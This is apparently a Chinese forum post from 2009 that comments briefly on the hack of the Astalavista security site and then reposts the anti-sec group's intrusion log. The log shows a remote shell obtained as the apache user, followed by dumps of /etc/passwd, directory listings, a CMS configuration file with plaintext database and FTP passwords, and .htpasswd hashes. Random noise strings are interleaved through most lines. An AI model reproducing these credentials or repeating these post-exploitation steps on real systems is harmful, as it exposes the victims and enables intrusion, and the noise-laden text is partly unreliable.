里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
4 x3 J+ x5 c. d3 z) Q3 @! `( P5 L. ~7 \1 J2 G8 J' V
[root@front3 ~]# curl -I litespeedtech.com
& ~) i% g" L/ Q. T9 X+ ?HTTP/1.1 200 OK* I8 f4 v" [0 D$ F
Date: Fri, 05 Jun 2009 22:54:51 GMT
# k% d& H4 B6 U- [+ ^Server: LiteSpeed
3 j2 ?* T$ A5 F7 h% y7 S
% @6 B4 ~% n ~: K( T另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
& g+ B5 ]) i, i# m) ?& I8 P Q
- @9 p8 _# M' v- t% [2 o J6 n有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
( v2 X& x& K2 K; `0 }. F! ~
& t g: m' \" j6 |" T8 M1 j
# w1 B9 k% P! F, H) p( t/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ ' n3 C, `! E# }1 e8 x4 I n2 R" h1 p& z
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \; g2 i" F( [2 F0 W# _; d Q
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \* v. i* a9 w4 C
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
! h0 P7 B& z. @% J! F \/ \/ \/ \/ \/ \/ \/
2 ?% W8 ^# G5 G2 c The Hacking & Security Community
' X, P9 g3 y* l9 Y" b[+] Founded in 1997 by a hacker computer enthusiast3 s% g: r2 E( J6 K0 U
[-] Exposed in 2009 by anti-sec group9 B6 y; D' q) ], M a4 X
! W( L9 a" p- M- M. s1 w3 _8 o& O( ]From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
; G3 t% y2 S7 W$ X. b>> 03. Who’s behind the site?
. f$ o8 `+ z5 j: d# h>>
2 Q6 b+ R( g4 \; Y; D) y. x>> A team of security and IT professionals, and a countless number of contributors from all over the world.
7 m7 M* x' A K8 [0 [) r( ?" d! z: `& Y5 O' Z- H" E) P
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?: o8 h+ x1 x- N
>>
+ t9 P5 ^$ V5 U% u>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and' h, L: \8 i* ^7 U: s% Y H/ y# b
military institutions." r, W. j9 O7 A ^& x) V1 _3 `7 [
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.; e! ?) V/ v6 \! ^( g2 r: V
( h4 s4 ^+ ? n2 ~3 l3 `. o$ SWhy has Astalavista been targeted?
6 }' B+ S- a" _" V( x, O, p4 e0 m) f! ^8 I& y, L
Other than the fact that they are not doing any of this for the “community” but
4 j& U# Q" w% l$ L$ E/ p% W3 @' ^& yfor the money, they spread exploits for kids, claim to be a security community' U& ~6 y- H* h! L5 i5 N4 c! `
(with no real sense of security on their own servers), and they charge you $6.66
3 Z! y3 i+ @$ C% q' E0 M4 s8 Zper months to access a dead forum with a directory filled with public releases5 R' K' m6 l; g& L4 F
and outdated / broken services.
% P/ t) c1 }4 F# M& J4 L; q! }
. _: I& Q t) g- S4 jWe wanted to see how good that “team of security and IT professionals” really is.
7 V$ ~4 z5 j5 X: \ h9 U3 R" Y& F+ G" g* b9 U! a2 g) @
Let’s begin.
6 A) P4 t4 b) G8 f
4 p$ Z' |1 M) c! s+ N; Hanti-sec:~# ./g0tshell astalavista.com -p 80+ P: Z1 a7 l i! A+ C* t
[+] Connecting to astalavista.com:80! C' Q8 q; E9 Z) p W {
[+] Grabbing banner…
' M! M) ~% F/ O1 ~" T; I9 C# vLiteSpeed
+ M* H3 b, Z4 v. C, `[+] Injecting shellcode…
: m7 D5 D2 a2 u+ h. z[-] Wait for it
: z/ s# Q" s) u! n f5 D# Y/ c- |) c9 u Z; Z6 f1 m& K+ N
[~] We g0tshell
& K& A4 E1 S* ^8 Q4 S0 s5 c1 zuname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
" k2 Q6 @" L# D, `ID: uid=100(apache) gid=500(apache) groups=500(apache)
; P3 e: @1 [, N- H
6 ^! m7 k, A7 O5 B7 gsh-3.2$ cat /etc/passwd
( F8 v& f' d! b2 I: hroot:x:0:0:root:/root:/bin/bash
! D5 B# B" ^7 G4 \- P( vbin:x:1:1:bin:/bin:/sbin/nologin
, i# \/ [$ o% \- Tdaemon:x:2:2:daemon:/sbin:/sbin/nologin
# f0 p- r) C0 e ?6 Z" f Jadm:x:3:4:adm:/var/adm:/sbin/nologin
$ `0 z. E. u( h4 e& |lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin6 B- ~" t* F* M) K& ]
sync:x:5:0:sync:/sbin:/bin/sync
! a" v, C0 W! Z$ F! rshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown" P k6 s) W7 T+ b' I8 R
halt:x:7:0:halt:/sbin:/sbin/halt. Q/ ? L4 a, T2 M) ^/ {
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin+ u1 d6 f0 {4 v' ~8 m) j
news:x:9:13:news:/etc/news:
+ A. I) P. s; }/ U) }uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
/ G' M' C$ g) m6 N* yoperator:x:11:0 perator:/root:/sbin/nologin5 W+ f0 M: T3 ]# t" A0 T
games:x:12:100:games:/usr/games:/sbin/nologin
% L; Y2 z3 h$ D/ n) i3 X; b. w0 jgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
7 \5 @9 L' ]' W& r: Bftp:x:14:50:FTP User:/var/ftp:/sbin/nologin! }1 x' Y! O/ h6 A- ]+ ?* C
nobody:x:99:99:Nobody:/:/sbin/nologin
: W0 b: C+ P* Y! e- nrpm:x:37:37::/var/lib/rpm:/sbin/nologin
/ s4 z, V, v5 T: @) @; e/ _' B0 mdbus:x:81:81:System message bus:/:/sbin/nologin
. p& `( m: X) ?! Z# U8 D% G/ G% D: nnscd:x:28:28:NSCD Daemon:/:/sbin/nologin- t Z6 l, @) [
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin0 g7 C" D, ?4 S7 ]
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
5 n+ C" L& m2 Y3 d* k7 ]; |vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin) G" q1 _+ D" N- f9 J2 {# s5 ?
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
% Y0 |( t: x6 d; ^, d/ J5 irpc:x:32:32 ortmapper RPC user:/:/sbin/nologin2 U8 ?9 @. @$ }$ _# e) F% n" b. I, e( z
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin& ], b. r( j6 n& p2 R/ g* W
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin: t) L% o8 M' ]6 R& K. ?4 R
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin1 x+ S. c5 [; Y' P
pcap:x:77:77::/var/arpwatch:/sbin/nologin, l8 s& M6 {3 R% R3 f1 I+ o# U
named:x:25:25:Named:/var/named:/sbin/nologin
. k/ r2 T$ M" ^2 m, hapache:x:100:500::/var/www:/bin/false
, v' }- `8 k* z! \2 {diradmin:x:101:101::/usr/local/directadmin:/bin/bash
# X9 d/ o& i9 Q4 W% L2 V" g emysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
" Y" D+ M$ L" R8 n( Z2 C% ywebapps:x:500:501::/var/www/html:/bin/bash. N* T0 j6 Z: U5 k; h
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
) u- u0 @0 H+ Y I0 {5 K* w4 F& nadmin:x:501:502::/home/admin:/bin/bash
$ h( w9 }. N2 P: s" wjon:x:502:503::/home/jon:/bin/bash
5 L! ^( g, d8 v) u4 mcom:x:503:504::/home/com:/bin/bash
& T" z4 B6 K" | i2 _ntp:x:38:38::/etc/ntp:/sbin/nologin
6 S. Z: W1 c! Nais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin' H: R% U: A# x( f: ~2 e( I
astanet:x:504:505::/home/astanet:/bin/bash5 Z; V0 u3 ^( r* r, Z' t
avahi:x:70:70:Avahi daemon:/:/sbin/nologin: J0 }: V$ Q5 m h3 K G d
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
* O( U9 V! b1 ~9 Z
8 j9 C4 A/ M/ ~; d" Hsh-3.2$ cat /etc/hosts) v/ {$ D6 `! E8 u
# Do not remove the following line, or various programs
9 x4 p2 e" W1 P# n; e# that require network functionality will fail.3 x, y! n; D& D- E, ?
127.0.0.1 localhost.localdomain localhost
8 a4 Q% G/ _' a6 i8 |# c::1 localhost6.localdomain6 localhost6: n5 T5 y. G7 w9 y
80.74.154.172 asta1.astalavistaserver.com
" _7 F R7 E, B) f
. z; F0 Z! Q( O* b9 Ksh-3.2$ pwd
+ I5 e) q7 D9 V$ _( ?, b/ k/home/com/public_html
# F% @6 `8 K! L: L, r
$ s, \. h( c% s' p8 k7 _0 vsh-3.2$ ls -la
+ E! P/ S! j2 Y" D; i; {, A! xtotal 184601 n* F8 @! T" {# K2 A8 d) v
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
, e* }, |8 A4 d# d% Sdrwx–x–x 11 com com 4096 Jun 25 2008 ..
4 m- q! f r( u _+ qdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
: F% ^! U0 R1 sdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
& w' L7 F1 L/ O! V' t+ _drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin; L4 f8 P3 v9 V$ E, h- s( c8 d5 A
drwxrwxrwx 2 com com 4096 May 19 00:50 config
& W8 P" g. \- d8 Fdrwxr-xr-x 2 com com 4096 Mar 20 11:05 core$ j1 y2 @9 h$ A0 D) M8 c
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules' }* T% Z! q+ e* [
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
9 i7 B/ N1 Z% `& W, ]drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
- l; `, @* c4 z) G, qdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__7 c" f1 S/ S- A9 ~3 s8 g6 e# }
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php/ Y8 P" T9 @" h! F; G% H( w" e
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
& D/ q7 t# e. n, Tdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
: J3 x' X) A, m2 a# R-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
r( S2 l+ F' u0 s4 n0 d$ Q- O! Wdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed7 B) d' b9 w5 U
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
" e* k$ h. Q$ Q' l4 K3 J-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak+ }" Y+ u ]2 O! O7 R
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak7 h) T3 B& R9 I( I) T* f% _
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool) `5 t2 D7 D% y5 `" B1 Y
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
+ J% b4 ]9 {0 k% r1 b+ }-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php' D+ Z- q# C7 H- T
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer* W* x. D& {6 ]$ }6 Q- H9 u( E( Z
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
$ N9 q2 b" G9 z. d, d$ Hdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib B; v" v! w# t5 c+ P
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media5 I4 \- Y9 b& F4 R9 c; Z. M4 _
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
2 [# @% z: L$ P Z$ sdrwxr-xr-x 34 com com 4096 May 28 16:30 modules L: ]/ Q/ w. |$ m3 {8 u
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
8 L: y7 ?( f, \4 R5 cdrwxrwxr-x 22 com com 4096 May 28 17:06 _new
; T3 Y" B! C0 K: m& |! Qdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old7 |" I# S% U7 _, U0 j
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy! }- t1 ` s4 J' L6 v
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy; o5 N" A6 V O9 L
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt6 h; T' k& H1 i% g: d9 ?
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml B5 ^" E/ L& i5 u; H Y% L8 o! |
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php4 w* l# ?7 M9 Y8 |
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes4 R% y# w: @: q6 x5 ~* B
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
* R" o! R+ M6 k3 ]7 Q( `# Edrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
* {( L7 U7 Q" m0 @% X7 t5 h# }( I5 x
sh-3.2$ head -20 index.php6 }" ~4 R( D4 c* e2 `% N
<?php
% C' Z1 n8 `4 e8 s. ?, z9 R; q) b Y' v
/**
\9 |* t9 O: V. s, f3 _, C& B* The main page for the CMS- ^# y3 W1 C) D& b( K
* @copyright CONTREXX CMS - COMVATION AG d1 L7 r' U( N
* @author Comvation Development Team
( G9 n, L4 P+ h. } ?' d ^) P% o7 _* @version v1.0.9.10.1 stable6 P. }% U6 m9 B0 K5 s
* @package contrexx8 Y* q: L- l% W
* @subpackage core
t6 \) I% Q$ I* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage+ x2 ` S/ n, x x* |2 x& U
* @since v0.0.0.0
0 P9 o9 ]( Y \( P0 ?3 c; S* @todo Capitalize all class names in project4 j% f [4 _; a2 N* B r. E# c
* @uses /config/configuration.php
" Z; I0 O8 B/ o! H* @uses /config/settings.php6 t0 ?6 M9 k" h" z1 R6 ^: j; n
* @uses /config/version.php
/ w9 i+ G$ k# _8 {3 H8 R6 g) Y2 c, l& F* @uses /core/API.php
T: O! k. j! u, n8 p; @* @uses /core_modules/cache/index.class.php
2 H' ~* S% l' N- V z* @uses /core/error.class.php
' p. w; W. {+ t9 E7 E1 N" u* @uses /core_modules/banner/index.class.php% P( Z2 G7 T, d" `8 H
* @uses /core_modules/contact/index.class.php
( t0 f% I% X! g9 c0 Y7 r8 k: O5 [# D+ d9 }* T! b
sh-3.2$ cd config/
5 W: L* B2 @4 q1 n. Esh-3.2$ ls -la6 `; F4 [3 U# S: s- h# \
total 32
- C2 t, \; Q7 M0 F% z) tdrwxrwxrwx 2 com com 4096 May 19 00:50 .0 W. ?, g( }2 n3 m! l
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..* C3 j$ Y/ V& S- H
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php2 k4 x+ J, d P# ]+ D' v8 y
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
S1 s: Z6 ]9 `5 @% O& i-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php2 g. X, d* [2 c7 R- [$ ?
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php5 x- X2 z. V" L1 i7 F! L
' u/ N1 M, w0 `7 c7 l0 k8 v8 A
sh-3.2$ cat configuration.php1 k0 K% u3 O* V5 A
[snip]
. I0 N0 o/ ~1 h- o" p$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost( D+ O" w6 U) l" P
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
, }* H5 f. }! s3 o- `$ `$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix/ G7 f- h. R$ n: y7 U1 f6 _
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
# c; R" ?" e4 n* a) v6 G+ g" }+ V$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
% N4 c! `5 H! ?! f# w5 G$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)" e0 N2 K' x; N
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
2 q+ h2 U. y' l6 X ], [4 G1 n[snip]5 Q7 i- E s, E4 K2 N
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
9 m0 c* ~5 w u5 W. N `4 t" ?$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
0 |" d4 o k" ^# [& j- R0 o2 t$ q5 r* O$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost) g( v2 C: C. [$ w2 F1 @. c
$_FTPCONFIG['port'] = 21; // Ftp remote port4 p0 M# l0 @8 ~; ^% E& z
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username8 V& `2 |& @! Q- s
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password8 C& x: @% w% M: s3 M
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
0 f9 ^9 D2 p, s$ h; w- h. G8 r/ c6 i% j
sh-3.2$ cd ..: s; Y) p/ u/ ^4 ?& ]6 r2 }
sh-3.2$ cd dvd/6 r( ? h, P- S) } w/ w
sh-3.2$ ls -la
}! H; `0 j, ~# q: ~total 2913780
5 h& @+ x+ Q+ {# qdrwxr-xr-x 2 com com 4096 Sep 9 2008 .5 i; Q# |, s5 {& a. b
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..1 V: {* p% f @% ~
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
( a/ }: v( v+ Q r9 b-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
* W g* @" D. ]5 U! \8 Q-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
2 b' R8 g. D' L) k3 K; n# ~-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
) Q% \7 C+ z/ u# T# r+ C- Z$ A% a0 P% z6 I% P+ x- m
sh-3.2$ cat .htaccess
5 Q. K% p, _$ J) m ` |authType Basic2 f0 f' G( m8 O/ q+ _
authName DVD( W+ X& u! A' k
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd( ]! Q6 P! }1 |; P4 @
require valid-user9 M4 |: i" o1 x w% @
. |7 V# f. U: _: w4 l4 Jsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd4 o+ `+ G5 |# I: q/ @
DVDdownload:CRD8cuY6.MPT60 M& q y. ^# K
DVDdownload2:CR8a36.wluFMg4 ?" A# `7 P5 w5 [+ ^ o7 F* v/ E
1 y8 Y H0 [0 |- V
sh-3.2$ cat test.php
( g) o% C+ r0 X# X<?php( Q$ H( ^ t4 J0 o3 A3 ]
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
) k, e9 ]# P5 H b' W$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));4 T& P0 a1 Z1 U& _! V
echo $url;; A2 e7 Q9 j9 N! u
?>
/ p, Y" h5 M9 W2 Y( V
5 h; |( c4 P |/ l: L) Osh-3.2$ cd modifications/* } i6 w% ~ Q0 o9 N: Y
sh-3.2$ ls -la8 M9 F7 r& `6 k& j5 l
total 32
3 I3 e7 c# v1 P# S4 ddrwxr-xr-x 8 com com 4096 May 11 12:48 .
4 }' D! F8 L! }* G+ P& Adrwxr-xr-x 30 com apache 4096 May 28 17:06 ..( G4 n' W9 l+ k2 n
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
- S( Z: K- j/ I8 hdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs$ S0 ?+ r) Q3 U& L* \3 o
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools \% M, O3 L9 _6 ]! {7 x
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
* f _* h7 P+ Q/ [drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
4 Y* S+ w& P. O- U( [drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
/ g; C' Z' I! W1 |! h, ~! ~5 a: N2 `* K7 @, m
sh-3.2$ ls -R
0 P' ~( R) ~; }.:
: |% t3 k0 @" K' M% b& acom_avtng cronjobs onlinetools pjirc search _tmp0 S: F- Q1 }* r4 F; C
) |' b1 ]- i }( d C, s! p: ^
./com_avtng:6 k- s |& [' |5 I& ~2 \5 _& [
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts4 t( e; l' x& ~$ h- V& g
/ d, U4 o, N& G! a$ p# B1 [./com_avtng/scripts:
2 ?3 T0 Q/ m l; g3 n! Vpopunder.js
; V$ i' Y* D+ M/ A6 r4 K3 m/ y, H' X0 \! H0 Y2 j4 C/ g
./cronjobs:
+ G; N" Y, m- c% }1 W$ {7 @9 yexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
! Q" Y1 [" S; z: f5 E0 n( H, b, g# @5 g
./cronjobs/tmp:
6 R! t- ~( z0 gcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv* U$ j7 V* f. T+ j* d
7 w4 t* m* [. k& U./onlinetools:9 l! n# u) |+ w8 Z: G
index.php/ j Q4 s6 w: y
0 _; b [. Z' I./pjirc:3 _9 U" v5 P0 w4 ^! S) W* T
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
# C" j3 s/ I% T. XAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
( k( @( B$ Z8 Z( K" I8 S5 _( [/ I3 u1 nbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
3 }( m1 X& _8 [' H. l+ L/ _/ `5 F5 Y+ {) V' C' r3 }
./pjirc/img:# f9 I7 J7 l) G# I4 }' E
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
+ a& i- O* ?! R5 |6 a; w0 Varbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
* @" ?+ W: E, T& s. [verre-eau.gif
8 J6 s+ y8 L" [" l6 E, t/ Kargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 0 e3 g, k" m- s- Q8 {
verre-vin.gif9 R+ b* D) S6 ^2 y9 X' y
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif. i1 r H8 s( W8 m- |
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
) S/ C/ y D1 M" c$ A: ]9 C! y. R2 l+ c2 h
./pjirc/snd:; ~+ T! B8 m0 z# G9 `
bell2.au ding.au- }1 B6 B# I( @8 l
7 m3 H4 W3 `/ d( E./search:6 }" Y+ h0 D9 U( g4 z
searchEngines.php search.php
0 e1 w3 W) n) [. G$ a0 D2 x7 M4 y# {
./_tmp:
( m5 w1 ]0 a: E7 r1 A. f" OdefaultPorts.php defaultPorts.txt
3 V6 Y# Z7 C* d
) X3 X' V' s( F/ q) o* osh-3.2$ cd cronjobs/* g& x+ d7 m4 J1 C% L
sh-3.2$ cat exploits.php# K; a+ `/ g- P R1 B
[snip]$ {6 ^' g; B, L% \
$categories = array();
! }' @7 L, M( y$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;3 O8 \' i, [8 {7 A2 n" w
$expolits = file($milw0rmFile);# f5 v: p$ W/ ]8 G% m
$comExploits = array();
+ H3 k" P1 R3 w5 w[snip]. ], c; s/ Y9 w/ |6 h# i/ R
// manage data: {& ~* K0 O! H' ^7 M
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
@2 _' V. E7 O6 e. E# B( j& r! p m% A3 K, g
// get path and title
& t7 \' N6 A+ m; D $expolits[$x] = trim($expolits[$x]);5 U" T, g- }. o7 j4 J9 o) u* P. v
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));" D( e) z8 K5 ?/ h1 a/ o
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);- E+ B3 u( u4 N
- S+ S' L1 F0 j" U j7 ?+ y3 } // check if file exists
8 m6 w, c/ F d5 ` if (file_exists($path)) {
2 n' m3 u2 H8 I" j& S; _- d: ~' I6 B
$text = file_get_contents($path);
+ P# l R6 {4 U& S8 _+ U
$ U$ D% o2 E: c. a% A* x8 P6 m* H% | // get content and date
- y6 w0 u2 u) i N* ^% V. v5 b$ f% A //$text = htmlspecialchars($text, ENT_QUOTES);
4 }. @4 P# j' Y8 M, W5 X8 Z $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));, _# E. t/ |+ \, L. X
if ($tmptext != ”) {
0 ~2 ~! h* N( \' f5 U) z $text = $tmptext;
9 K+ ^0 k7 L/ e4 O9 u( x } else {
8 ?- }& I# G. W! D6 z $text = addslashes(htmlentities($text, ENT_QUOTES));' S# ^8 `2 e$ g, l
}
" m F% |. u9 q7 ]7 p9 M/ I/ s $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));8 ^" v: X) ~: j
$tmp = explode('-', $date);
) o) Q6 j) w# H $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));4 E6 R$ k- v* R' N
$cat = getCategory ($path);
& {4 Y" [2 f9 n; Z/ A4 M $ext = pathinfo(basename($path));
7 s1 }, `" ^$ `5 g $ext = $ext['extension'];
0 P( g: J) L& d- t $qStr = ”& u, a D. G( G9 ^4 [9 a
SELECT `id`
7 ?6 w; e8 F3 W( o FROM `contrexx_module_exploits`
: |4 t" y8 ]7 u2 w& T( ~* f' L WHERE `title` = ‘” . $title . “‘
/ O. H X9 b9 y AND `date` = ‘” . $date . “‘- a: H- \: h+ _4 Z9 k
“;
, u. T7 q+ {; o# t0 `3 h echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
! d4 I6 H" `- C9 t# f' M $q = $_objDB->query($qStr);
+ V6 o- i! q" {* n, ]5 f+ p; g) t* o
if ($q->numRows() == 0) {% Y+ Z! v; g1 f; j! I0 w
6 d& d- c% Y; W+ O5 a // prepare array
3 ]: d* f! u; u6 L' w $comExploits[$x]['date'] = $date; u) I" o- U4 w, Z2 L" e
$comExploits[$x]['title'] = $title;3 Y% @: L4 \6 [4 Y- x. r) {
$comExploits[$x]['author'] = ‘milw0rm’;: c U; \0 _8 S
$comExploits[$x]['text'] = $text;
# h; F% r( ^ d* F1 u $comExploits[$x]['source'] = $ext;; V$ B4 w) r5 |
$comExploits[$x]['url1'] = ”;
7 c4 |7 L$ M7 j $comExploits[$x]['url2'] = ”;1 J9 \+ w7 C& S. M8 J$ R
$comExploits[$x]['catid'] = $cat;+ q4 Q8 L: E/ N/ @, c# [$ j+ f0 e5 L
$comExploits[$x]['lang'] = ‘2′;
, E4 z# a; S: e: s/ p& j $comExploits[$x]['userid'] = ‘12′;
) C- h4 f) J/ _5 p' C $comExploits[$x]['startdate'] = ‘0000-00-00′;6 G9 n5 Q$ ~3 M3 N S1 d
$comExploits[$x]['enddate'] = ‘0000-00-00′;
/ y; e1 t; { D4 ~/ d( R. H $comExploits[$x]['status'] = ‘1′;- G9 D D+ P" E. w. [
$comExploits[$x]['changelog'] = $date;0 V* j* G- m1 I+ D w
9 z/ z: l- B6 S$ r }& P9 J8 h# ]4 \8 Y, G1 ~5 W: ?
[snip]+ K0 i- k- i5 X% B' Y
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
. C2 H5 \! N3 }, A) A: d. j. n<rss version=”2.0″>% }9 ~- D0 d& b, Y
<channel>
! I4 q# ^2 ~ x8 _ <title>ASTALAVISTA.com - Exploits</title>) d: X' J5 F+ }' }
<link>http://www.astalavista.com/exploits</link>
2 P. O9 i9 S6 U6 ? <description>All availably Exploits.</description>
* I) f( H: @, |: _7 T& r <language>en-us</language> D! e% D: k. L- t" E+ o$ s5 o5 W
